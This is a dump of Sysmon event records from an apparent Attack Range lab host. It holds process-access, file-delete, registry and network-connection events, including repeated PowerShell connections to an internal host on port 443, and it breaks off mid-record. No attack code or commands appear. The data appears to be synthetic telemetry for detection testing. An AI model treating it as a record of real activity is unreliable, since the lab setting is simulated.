18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:00.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC713C3A40C3FD0CC980B46DADAFF01B,SHA256=CAD8E10EF461BED7CAFC9B90E74409058ABF8050961F8C70BABE6361DF4A7241,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:01.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16383FC8AC45500AF857944929F6FB6D,SHA256=F8636C8113FA0E85B2132BDBE61DC520BF18607F421D0BAB1F32D08F456605B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:01.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=043248A8FFC0CD0189D0626476956B19,SHA256=BD277E4FCADA320E5729A3CD13CCC8CE5B1A9666A7FB35657D28ED31DA4F1E0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:02.219{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A336302A70913FEB691177B68CB7BDD,SHA256=ED5354304272891B646CC5A6E909F63C6779F2C67AAB93C9177A0295C6DF8E2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:26.265{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56589-false10.0.1.12-8000- 354300x800000000000000035084306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:25.829{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56588-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:03.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2E1653B19FFE8085EE6F095BF845C0C,SHA256=9BD68B53C8A543BB3950FCB044670F14E0CDB60C0456D7A2BFA9B05553906794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:04.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14DB3B0D3BE713B65DA263AB59CF4D0B,SHA256=846858D3048E5F63E36689AFB170FC85DE87E80687AB0DAD92622439B0BFED98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:05.316{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4B06F092E520B1AFEE4EFFC6917CC4,SHA256=66982DB47A5FCD6E499F9D252DE9F78A69A281BD13780DF61AD5311E85A08B46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:06.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D84EE0BE0C1669FC46DD2DE1FC8A10DA,SHA256=29E71705B3C84520D7C17957CEB14FFEB57B8074FFC4401A754D4EBFFB68B5FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:06.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0A629F56CB2EDC831A11A4690F04AA,SHA256=FC1B338A9E280B9D9FB649A45D4D9E288343235B45C79EA6AB03D3C32D321D95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:07.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6350EB5203CA0C95941A57B12CC06C84,SHA256=7F7C09B20E344A1C7D44B5182190E78682844F8CD7D5FB14ACCAD6D0F7A572A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:31.835{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56591-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:31.268{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56590-false10.0.1.12-8000- 23542300x800000000000000035084317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:08.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C53838BDD6D408716EA1FA5D791E0D5E,SHA256=B67BE98BFD0D0D1873E9C1F93984411FFF2C2C4397FDA9503A9341297379C54B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:09.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEBF4A74591F01F9C912CD11E39E31A4,SHA256=419A5EE23588471F7527DA986DB18C386B5AEA1CC823156C9D20D8C4DB58D862,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:10.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1CF438D86E7BD102138C0AA9C9FEF9C3,SHA256=E49DA8099179A589981221F89BAA71424E7140476987AB0B6741EB006CB34B68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:10.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0EFF05DBCF3E302021A42B392CF58B,SHA256=FBE8678693003C1C261E99252B1AE4DE3278ADA5A331610CED19178323EA1DF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035084328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035084327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717ee6fe) 13241300x800000000000000035084326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59d-0x8c25d478) 13241300x800000000000000035084325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0xedea3c78) 13241300x800000000000000035084324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ae-0x4faea478) 13241300x800000000000000035084323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035084322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717ee6fe) 13241300x800000000000000035084321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59d-0x8c25d478) 13241300x800000000000000035084320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0xedea3c78) 13241300x800000000000000035084319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:10:10.346{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ae-0x4faea478) 23542300x800000000000000035084332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:11.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92D870F382BCE9B968619CB6229C717B,SHA256=FFD2C9039BFFE236C838C8D00FCE03250A7DDA796F91B9C5E679EA438E69D782,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:35.849{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56592-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:12.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06433FD7A0F556062E4F81C765813187,SHA256=671C8099AEADD9C6427933A1D549094FDB0A8070A1EA61094977BBAF57BC2436,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:37.047{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56593-false10.0.1.12-8000- 10341000x800000000000000035084343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.614{B81B27B7-4E05-613A-3590-03000000C801}68126496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.514{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C503E14CCF027FEC60EA8B80D4D5AE62,SHA256=B57B2FD8786F39C7FDB3F1BF8ADFA80DCC06C3A91E6D40E57D837499D564AB9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.414{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:13.409{B81B27B7-4E05-613A-3590-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 